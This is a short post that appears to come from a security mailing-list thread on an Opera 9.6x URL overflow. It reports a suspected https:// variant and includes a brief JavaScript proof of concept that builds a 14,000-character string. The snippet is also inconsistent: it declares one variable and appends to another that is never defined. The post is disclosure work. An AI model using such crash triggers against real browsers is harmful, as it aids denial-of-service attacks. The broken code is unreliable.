[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Opera 9.6x file:// overflow


is very curious vulnerability...

I think I found a variant of this vulnerability, if using another protocol (eg: https ://).

I am sure that is an variant because providing other protocolos (eg: http://) does not work, nor the exceptions that are generated are equal to fail.

------------------ POC ---------------------

var evil = "https://";;

for(var i = 0; i<14000; i++)

code += "A";



Juan Pablo Lopez Yacubian